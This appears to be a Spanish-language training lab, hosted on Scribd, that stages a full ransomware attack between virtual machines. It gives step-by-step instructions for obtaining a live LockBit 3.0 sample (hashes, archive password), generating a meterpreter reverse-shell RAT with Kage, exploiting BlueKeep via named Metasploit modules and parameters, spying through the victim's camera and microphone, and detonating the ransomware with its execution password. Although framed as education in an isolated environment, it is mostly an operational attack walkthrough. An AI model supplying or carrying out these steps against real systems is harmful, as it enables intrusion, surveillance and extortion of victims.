Scribd
Cargar
28 vistas13 páginas

Lab2 Ransomware

Cargado por

leon.guerrero
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
28 vistas13 páginas

Lab2 Ransomware

Cargado por

leon.guerrero
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Laboratorio Ataque de Ransomware LockBit 3.

Objetivo:
El siguiente laboratorio tiene como objetivo realizar la demostración de un ataque de ransomware
mediante la explotación de una vulnerabilidad, seguido de la infección de un troyano de acceso remoto
en un entorno virtualizado.

Requerimientos:
Vamos a trabajar en el entorno virtualizado VirtualBox.

• Link: https://www.abuseipdb.com/check/172.16.45.165
Utilizaremos dos máquinas Virtuales. Una con sistema operativo Kali Linux la cual será nuestra
maquina atacante y otra maquina con sistema operativo Windows 7 que sería nuestra víctima.

A continuación, el link de descarga de las imágenes ISO y OVA de las maquinas.

• Link ISO: Imágenes ISO


• https://celsia-
my.sharepoint.com/my?id=%2Fpersonal%2Fjdcardona%5Fcelsia%5Fco
m%2FDocuments%2FMaquinas%20Virtuales%2FIm%C3%A1genes%20I
SO&ga=1

• Link OVA: OVA_VirtualBox


• https://celsia-my.sharepoint.com/:f:/p/jdcardona/Ep5J7f-
CJkhMn6LrJ8b43ToBoGq4sMUyQ3H-dDPu7zl9Qw?e=KGo9KI
1. Importar máquinas virtuales.
Luego de descargar nuestros archivos OVA, vamos a importar nuestras maquinas.

Si optan por las imágenes ISO deberá realizar la instalación del SO desde cero.

Seleccionamos el archivo OVA.

Listo, ya deberíamos tener nuestras maquinas corriendo.


2. Configuración de red.
Antes de iniciar nuestras maquinas, debemos asegurarnos de que estén primeramente en el mismo
segmento de red y que sea diferente a nuestra maquina anfitrión.

Vamos a seleccionar Redes NAT y vamos a asignarle un nombre de red y el direccionamiento que
tendrá. En este ejemplo vamos a trabajar con la red 10.0.2.0/24.

La asignación del direccionamiento a las máquinas virtuales se hará de forma automática por DHCP.
3. Configuración de red en las VM.
Vamos a configurar cada máquina virtual para asignarle la configuración creada en el paso anterior.

En cada una de ellas vamos a configuraciones, luego red y por ultmimo asignamos la red NAT con el
nombre que creamos.

4. Comprobar conectividad entre las VM.


Vamos a iniciar las dos máquinas virtuales y vamos a comprobar que tengamos conectividad entre
ellas.

• Desde la maquina Windows 7.

• Desde la Maquina Kali Linux.


5. Instantáneas.
Es importante que tengamos instantáneas principalmente de la maquina víctima, ya que luego de
denotar el ransomware la maquina quedaría inutilizable y si requerimos volver a realizar el lab
deberíamos realizar una instalación nueva.

Para ello vamos a iniciar nuestra maquina Windows 7 y realizar nuestra instantánea, esto nos servirá
para regresar las veces que necesitemos a este punto de instalación.

Asignamos un nombre y una descripción, podría ser del estado de la máquina para tener una
referencia. Se podrían realizar las instantáneas que se requieran.
6. Descargar muestra de ransomware.
Vamos a necesitar una muestra de ransomware para ser detonada en el equipo víctima. Para ello
vamos a descargar del siguiente repositorio, previamente registrado, una muestra del ransomware
LockBit 3.0.

• Link: https://virusshare.com/
Los datos hash de la muestra son los siguientes.

• MD5 38745539b71cf201bb502437f891d799
• SHA1 f2a72bee623659d3ba16b365024020868246d901

La muestra se descarga en un archivo comprimido protegido con contraseña. Para descomprimir


vamos a utilizar la contraseña “infected”, luego renombramos la muestra y colocamos la extensión
“.exe”, finalmente la ubicamos en el escritorio de nuestra maquina Kali.

7. Descarga e instalación de Kage (RAT).

Una de las herramientas que utilizaremos es Kage la cual está diseñada para interactuar con sesiones
meterpreter y hará las veces de un Troyano de acceso remoto (RAT).

Vamos a descargar desde el siguiente link la herramienta.

• Link: https://github.com/Zerx0r/Kage/releases
Ahora que descargamos la herramienta, vamos a ingresar como root, al directorio de descargas. Luego
asignaremos permisos de ejecución con “chmod +x”.

Ahora simplemente ejecutamos la herramienta y esperamos que aparezca la interfaz gráfica.

Damos clic en el botón de encendido para iniciar la base de datos.


Luego de un momento, nos arrojara usuario y contraseña de acceso. Importante guardar estos
datos.

iniciamos sesión con las credenciales.


8. Creación carga Kage (RAT).
Vamos a crear la carga que será enviada a la víctima. Seleccionamos el Payload
“windows/meterpreter/reverse_tcp”. Luego ingresamos la IP de Kali la cual recibirá la conexión y e
puerto 4444.

Mas abajo ingresamos el nombre que tendrá nuestra carga con la extensión “exe”, nuevamente el
payload, IP, puerto y el formato del archivo que será “exe” para sistemas Windows. Por último damos
en generar y nos arrojara la ubicación donde quedo guardado.

Vamos a mover esta carga hasta nuestro escritorio de Kali, junto con nuestra muestra del
ransomaware.

Nota: Este seria un buen momento para realizar una instantánea de la maquina Kali.
9. Reconocimiento
Iniciamos con un reconocimiento de nuestro objetivo, realizamos un escaneos de puertos con NMAP.

Luego de observar los puertos abiertos, identificamos el puerto 3389 para el servicio RDP el cual en
muchas versiones de sistemas operativos.

Vamos a utilizar la herramienta Metasploit, ejecutando el comando “msfconsole”, luego usaremos el


módulo auxiliar para escanear e identificar si el objetivo es vulnerable al CVE-2019-0708.

Usamos el comando “use auxiliary/scanner/rdp/cve_2019_0708_bluekeep”. Ahora con el comando


“rhost” asignamos la IP de la víctima. Finalmente ejecutamos “exploit” para iniciar la validación.

Se identifica que el equipo es vulnerable.

10. Explotacion
Ahora que sabemos que el objetivo es vulnerable, vamos a utilizar el siguiente comando para usar el
exploit que explota esta vulnerabilidad.

El comando “use exploit/windows/rdp/cve_2019_0708_bluekeep_rce”. Luego ingresamos los


siguientes parámetros.

• Set payload = payload utilizado.


• Set rhost = IP del objetivo
• Set rport = puerto del objetivo vulnerable
• Set lhost = IP de la maquina Kali
• Set lport = Puerto de la maquina Kali por donde recibirá la conexión, diferente al utilizado por
Kage.
Iniciamos el exploit y obtenemos nuestra shell meterpreter. Con el comando “shell” cambiamos a una
terminal del sistema operativo para ejecutar comandos. Por ejemplo, identificar los usuarios del
sistema.

11. Detonación del RAT


Regresamos a nuestra shell meterpreter con “exit” para cargar el archivo creado en la herramienta
Kage. Usamos “uplaod” seguido de la ruta del archivo y la ruta destino identificadas en el paso anterior
en la exploración del sistema operativo. En este caso vamos a dejarla en el escritorio del usuario
“user1”. Luego regresamos a una terminal con “shell” y ejecutamos la carga.

Nos dirigimos a nuestra interface grafica de Kage y el menú sesiones, vamos a encontrar que nuestro
equipo ya está agregado.

Desde esta interfaz podemos realizar diferentes interacciones con nuestra maquina víctima, como por
ejemplo captura de imágenes de equipo, activación del micrófono y grabación, así como encender la
cámara en caso de tener.
Podemos recorrer todo el directorio del equipo, cargar y descargar información o ejecutar comandos
adicionales con el fin de identificar el perfil del usuario, información importante de la víctima etc.

12. Detonación del Ransomware.


Ahora que ya tenemos información del objetivo y decidimos detonar nuestra muestra de rasnomware.

Regresamos a nuestra Shell meterpreter y usando nuevamente “upload” vamos a transferir la carga
del ransomware a la victimo, nuevamente ubicarlo en el escritorio del usuario “user1”.

Este ransomawre tiene la particularidad de que necesita una contraseña para ser ejecutado.

Vamos a usar el comando “ransom.exe -pass db66023ab2abcb9957fb01ed50cdfa6a” para ejecutar


nuestra muestra
Luego de unos minutos, vamos a observar que el ransomwae finalizo su proceso de cifrado de la
víctima, dejando la nota de rescate y el cambio del fondo de pantalla característico de la banda.

También podría gustarte